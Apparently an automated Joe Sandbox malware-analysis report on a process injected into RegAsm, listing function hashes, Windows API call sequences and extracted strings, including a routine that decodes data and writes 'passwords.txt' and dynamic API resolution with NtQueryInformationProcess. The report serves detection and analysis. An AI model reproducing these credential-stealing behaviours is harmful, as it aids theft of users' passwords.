Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction ID: dc8951e85de2c1e6f7499b69a4da627be26416e02c72ac242db8ea0278464100
Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction Fuzzy Hash: 4AE0923A004700BBCA225B54DE86E4ABBA6BF48B10F589C1CF6C521670C662A8A4EB41

Uniqueness

Uniqueness Score: -1.00%

Function 198C5910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 198C597E

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: 99ac8b8ff7ac20fd44a7fc33c61a9c6408ea2003c3c51453c767e40f8320c326
Instruction ID: 7b8845c88417f03955967f0393a34c1911c844c092ef92c4ea3c32072a75fc3b
Opcode Fuzzy Hash: 99ac8b8ff7ac20fd44a7fc33c61a9c6408ea2003c3c51453c767e40f8320c326
Instruction Fuzzy Hash: 1B1159BA500206BFDB109F58CC84F86BBADFF49714F488159F5089B291C3B6F5A4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 198DD3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 022da73ef9ef391700bca6df03e86d466c6f76eaf4e92ed060027de2a8f998af
Instruction ID: 2dfd4959d73ff1736015b851603418983f939dc157fa794f30856bb020022697
Opcode Fuzzy Hash: 022da73ef9ef391700bca6df03e86d466c6f76eaf4e92ed060027de2a8f998af
Instruction Fuzzy Hash: 0E3157B4600305AFE704DF69EC85E66B3EAFF58214F08852CF948D3681E776F951CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 198C55B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d08ad06df863ba2e1d68c081e726f34128eb9525d6de71427afecbf59a97b0ab
Instruction ID: 79bb88382db4895a258251e49ead637aeaced55b2a1eb3bf36c5ee2220c18ed8
Opcode Fuzzy Hash: d08ad06df863ba2e1d68c081e726f34128eb9525d6de71427afecbf59a97b0ab
Instruction Fuzzy Hash: 2D319AB5608301AFEB108F2ADC84F5777E9EF94344F18882CF8468B291E771E954CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB33 Relevance: 94.9, APIs: 63, Instructions: 386memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040AB38

Part of subcall function 0040AA42: _EH_prolog.MSVCRT ref: 0040AA47
Part of subcall function 0040AA42: lstrlen.KERNEL32(?,00000001,75AA5460,00000000), ref: 0040AA65
Part of subcall function 0040AA42: strchr.MSVCRT ref: 0040AA7B

GetProcessHeap.KERNEL32(00000008,?,6CD67FA0,75AA5460,00000000), ref: 0040AB83
HeapAlloc.KERNEL32(00000000), ref: 0040AB8A
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AB9F
HeapFree.KERNEL32(00000000), ref: 0040ABA6
strcpy_s.MSVCRT ref: 0040ABC8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040ABD9
HeapFree.KERNEL32(00000000), ref: 0040ABE0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AC0A
HeapFree.KERNEL32(00000000), ref: 0040AC11
GetProcessHeap.KERNEL32(00000008,?), ref: 0040AC1C
HeapAlloc.KERNEL32(00000000), ref: 0040AC23
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AC38
HeapFree.KERNEL32(00000000), ref: 0040AC3F
strcpy_s.MSVCRT ref: 0040AC5E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AC6F
HeapFree.KERNEL32(00000000), ref: 0040AC76
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AC95
HeapFree.KERNEL32(00000000), ref: 0040AC9C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040ACA7
HeapAlloc.KERNEL32(00000000), ref: 0040ACAE
GetProcessHeap.KERNEL32(00000000,?), ref: 0040ACC3
HeapFree.KERNEL32(00000000), ref: 0040ACCA
strcpy_s.MSVCRT ref: 0040ACE1
GetProcessHeap.KERNEL32(00000000,?), ref: 0040ACF2
HeapFree.KERNEL32(00000000), ref: 0040ACF9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AD1E
HeapFree.KERNEL32(00000000), ref: 0040AD25
GetProcessHeap.KERNEL32(00000008,?), ref: 0040AD30
HeapAlloc.KERNEL32(00000000), ref: 0040AD37
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AD4F
HeapFree.KERNEL32(00000000), ref: 0040AD56
strcpy_s.MSVCRT ref: 0040AD75
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AD86
HeapFree.KERNEL32(00000000), ref: 0040AD8D
lstrlen.KERNEL32(00000000), ref: 0040AD94
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040ADA6
HeapAlloc.KERNEL32(00000000), ref: 0040ADAD
lstrlen.KERNEL32(?), ref: 0040ADC4
strcpy_s.MSVCRT ref: 0040ADEB
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AE03
HeapFree.KERNEL32(00000000), ref: 0040AE0A
lstrlen.KERNEL32(?), ref: 0040AE13
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040AE22
HeapAlloc.KERNEL32(00000000), ref: 0040AE29
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AE39
HeapFree.KERNEL32(00000000), ref: 0040AE40
strcpy_s.MSVCRT ref: 0040AE52
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AE5E
HeapFree.KERNEL32(00000000), ref: 0040AE65
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AE8B
HeapFree.KERNEL32(00000000), ref: 0040AE92
GetProcessHeap.KERNEL32(00000008,?), ref: 0040AE9D
HeapAlloc.KERNEL32(00000000), ref: 0040AEA4
strcpy_s.MSVCRT ref: 0040AEBB
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AECC
HeapFree.KERNEL32(00000000), ref: 0040AED3
lstrlen.KERNEL32(00000000,00000000,?,?,?), ref: 0040AF39
lstrlen.KERNEL32(00000000,00000000), ref: 0040AF49
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AF80
HeapFree.KERNEL32(00000000), ref: 0040AF87
GetProcessHeap.KERNEL32(00000000,?), ref: 0040AFD2
HeapFree.KERNEL32(00000000), ref: 0040AFD9

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prolog$strchr
String ID:
API String ID: 2055753264-0
Opcode ID: 0362cd235d03f128da0e166cdddf9ad3111f92cf4bce827dcdf02c963a387dd1
Instruction ID: c05d7502ecd2eacdcf272a4942f4d7feb1ffdb60bb1a06669d9f5fdcf2215b79
Opcode Fuzzy Hash: 0362cd235d03f128da0e166cdddf9ad3111f92cf4bce827dcdf02c963a387dd1
Instruction Fuzzy Hash: 21E10172C00219ABCF01AFE1ED499AFBB7ABF08305F04582AF911B3151DB395615DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040835D Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 258stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408362

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00408462
GetFileSize.KERNEL32(00000000,00000000), ref: 0040846A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00408476
??_U@YAPAXI@Z.MSVCRT ref: 00408480
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408491
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040849D
HeapAlloc.KERNEL32(00000000), ref: 004084A4
StrStrA.SHLWAPI(?), ref: 004084B6
StrStrA.SHLWAPI(-00000010), ref: 004084D0
lstrcat.KERNEL32(?), ref: 004084E4
lstrcat.KERNEL32(?,00000000), ref: 004084F6
lstrcat.KERNEL32(?,00423D64), ref: 00408504
lstrcat.KERNEL32(?,00000000), ref: 00408516
lstrcat.KERNEL32(?,00423D68), ref: 00408524
lstrcat.KERNEL32(?), ref: 00408533
lstrcat.KERNEL32(?,-00000010), ref: 0040853D
lstrcat.KERNEL32(?,00423D6C), ref: 0040854B
StrStrA.SHLWAPI(-000000FE), ref: 0040855B
StrStrA.SHLWAPI(00000014), ref: 0040856B
lstrcat.KERNEL32(?), ref: 0040857F

Part of subcall function 0040825F: memset.MSVCRT ref: 00408286
Part of subcall function 0040825F: lstrlen.KERNEL32(0040858B,00000001,?,00000014,00000000,00000000,?,0040858B,00000014), ref: 004082A0
Part of subcall function 0040825F: CryptStringToBinaryA.CRYPT32(0040858B,00000000,?,0040858B,00000014), ref: 004082AA
Part of subcall function 0040825F: memcpy.MSVCRT ref: 00408312

lstrcat.KERNEL32(?,00000000), ref: 00408590
lstrcat.KERNEL32(?,00423D70), ref: 0040859E
StrStrA.SHLWAPI(-000000FE), ref: 004085AE
StrStrA.SHLWAPI(00000014), ref: 004085BE
lstrcat.KERNEL32(?), ref: 004085D2

Part of subcall function 0040825F: lstrcat.KERNEL32(00423BB7,00423BBB), ref: 00408339
Part of subcall function 0040825F: lstrcat.KERNEL32(00423BB7,00423BBE), ref: 00408351

lstrcat.KERNEL32(?,00000000), ref: 004085E3
lstrcat.KERNEL32(?,00423D74), ref: 004085F1
lstrcat.KERNEL32(?,00423D78), ref: 004085FF
StrStrA.SHLWAPI(-000000FE), ref: 0040860F
lstrlen.KERNEL32(?), ref: 00408625
memset.MSVCRT ref: 00408678
CloseHandle.KERNEL32(00000000), ref: 00408681

Strings

passwords.txt, xrefs: 00408637

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$H_prologlstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
String ID: passwords.txt
API String ID: 2199717062-347816968
Opcode ID: ba8819ed37eec71e66bc769f1423cf4fe2ea174bfdb646640f444bb92cd5fd13
Instruction ID: d18807dec5b2fcf3952a6fd5a802b184d55c75befddb125860330b6468982be3
Opcode Fuzzy Hash: ba8819ed37eec71e66bc769f1423cf4fe2ea174bfdb646640f444bb92cd5fd13
Instruction Fuzzy Hash: C3A18D72801109EFCB01EBA1ED49AEE7F7AFF18314F14182EF511B21A1DB391A15DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00415D81 Relevance: 57.9, APIs: 32, Strings: 1, Instructions: 153libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00415DC5
GetProcAddress.KERNEL32 ref: 00415DDC
GetProcAddress.KERNEL32 ref: 00415DF3
GetProcAddress.KERNEL32 ref: 00415E0A
GetProcAddress.KERNEL32 ref: 00415E21
GetProcAddress.KERNEL32 ref: 00415E38
GetProcAddress.KERNEL32 ref: 00415E4F
GetProcAddress.KERNEL32 ref: 00415E66
GetProcAddress.KERNEL32 ref: 00415E7D
GetProcAddress.KERNEL32 ref: 00415E94
GetProcAddress.KERNEL32 ref: 00415EAB
GetProcAddress.KERNEL32 ref: 00415EC2
GetProcAddress.KERNEL32 ref: 00415ED9
GetProcAddress.KERNEL32 ref: 00415EF0
GetProcAddress.KERNEL32 ref: 00415F07
GetProcAddress.KERNEL32 ref: 00415F1E
GetProcAddress.KERNEL32 ref: 00415F35
GetProcAddress.KERNEL32 ref: 00415F4C
GetProcAddress.KERNEL32 ref: 00415F63
GetProcAddress.KERNEL32 ref: 00415F7A
LoadLibraryA.KERNEL32(00415C07), ref: 00415F8B
LoadLibraryA.KERNEL32 ref: 00415F9C
LoadLibraryA.KERNEL32 ref: 00415FAD
LoadLibraryA.KERNEL32 ref: 00415FBE
LoadLibraryA.KERNEL32 ref: 00415FCF
GetProcAddress.KERNEL32(75A70000), ref: 00415FEA
GetProcAddress.KERNEL32(75290000), ref: 00416005
GetProcAddress.KERNEL32 ref: 0041601C
GetProcAddress.KERNEL32(75BD0000), ref: 00416037
GetProcAddress.KERNEL32(75450000), ref: 00416052
GetProcAddress.KERNEL32(76E90000), ref: 0041606D
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00416083

Strings

NtQueryInformationProcess, xrefs: 00416073

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: e8990a85bf392c883529f3acdb73d591fb891e8f987fcc599ecf97d09dc357f3
Instruction ID: 103555bb0f45b27d9f1b78275277d91a90b856d1509b2306d02bc0e97eb74878
Opcode Fuzzy Hash: e8990a85bf392c883529f3acdb73d591fb891e8f987fcc599ecf97d09dc357f3
Instruction Fuzzy Hash: 7871EB75511600EFDB169FA0FE099293FB7FB48B21B14712AF905D2270EB364862EF94

Uniqueness

Uniqueness Score: -1.00%

Function 19905660 Relevance: 54.7, APIs: 26, Strings: 5, Instructions: 452COMMON

Download Yara Rule

Strings

YHI;, xrefs: 19905663
,%.*s, xrefs: 19905804, 19905835
Auxiliary rtree columns must be last, xrefs: 199056B3, 199058B3
_node, xrefs: 1990579E
CREATE TABLE x(%.*s INT, xrefs: 199057CA

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$YHI;$_node
API String ID: 0-287120110
Opcode ID: b840d1bc6dfbaccaf3a735cd0c026524429bf8e85c68ab3cd0a819cf7a47e21c
Instruction ID: c02c4310cd8f3e7766ec3883cc5b8b48112cfcf39390544003732b59f6961a60
Opcode Fuzzy Hash: b840d1bc6dfbaccaf3a735cd0c026524429bf8e85c68ab3cd0a819cf7a47e21c
Instruction Fuzzy Hash: 47F1DD755003419FD7119F39C890A5AB7ECFF44704F8C442DEDAA87242D736E99ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1984CC80 Relevance: 47.7, APIs: 15, Strings: 12, Instructions: 470COMMON

Download Yara Rule

Strings

u, xrefs: 1984D16D
%04d, xrefs: 1984D1CE
%02d, xrefs: 1984CE2C, 1984CE34, 1984CF27, 1984CF6F, 1984CFCE, 1984CFE9, 1984D10A
%2d, xrefs: 1984CE27
%06.3f, xrefs: 1984CE5F
%02d:%02d:%02d, xrefs: 1984D12E
%.16g, xrefs: 1984CFB3
%lld, xrefs: 1984D0EE
%03d, xrefs: 1984CF81, 1984CF8B
%02d:%02d, xrefs: 1984D080
%.3f, xrefs: 1984D0BF
%04d-%02d-%02d, xrefs: 1984CE82

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
API String ID: 0-1613945299
Opcode ID: 02d34d61ce7b02459986d29f1b8a66466ebb76164ffb1de185e772414b37e567
Instruction ID: a6128d4e92d91e55d821d33b4377fa13108a8380158d8978c7daed18b0af0372
Opcode Fuzzy Hash: 02d34d61ce7b02459986d29f1b8a66466ebb76164ffb1de185e772414b37e567
Instruction Fuzzy Hash: 86F10475A08359ABD300CF68CC45F5BB3EABF95700F9C8A1DF98497241E635F9488752

Uniqueness

Uniqueness Score: -1.00%

Function 198C9120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

,%s, xrefs: 198C9297
_node, xrefs: 198C9202
CREATE TABLE x(_shape, xrefs: 198C9268

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%s$CREATE TABLE x(_shape$_node
API String ID: 0-1242591684
Opcode ID: 7ee28c8ce020acee1e3585275b2b8db62aecb49383dd0e37f3e704bf617be638
Instruction ID: 8bdf7a16a142ad0809851929d15a28fd105bb194c898c3a40e2efc406bee3155
Opcode Fuzzy Hash: 7ee28c8ce020acee1e3585275b2b8db62aecb49383dd0e37f3e704bf617be638
Instruction Fuzzy Hash: 09C1DDB5500341AFD7108F3CCC84B9677B8FF50709F09956CE85A87292DB36E95ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1997B050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON

Download Yara Rule

Strings

(blob), xrefs: 1997B26C
,%s%s%s, xrefs: 1997B137
%.16g, xrefs: 1997B217
program, xrefs: 1997B2FB
vtab:%p, xrefs: 1997B283
%.18s-%s, xrefs: 1997B192
%s(%d), xrefs: 1997B1B3
%lld, xrefs: 1997B1DA, 1997B24C
NULL, xrefs: 1997B267, 1997B324, 1997B325
%c%u, xrefs: 1997B2C3
k(%d, xrefs: 1997B0A5
BINARY, xrefs: 1997B0D3

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
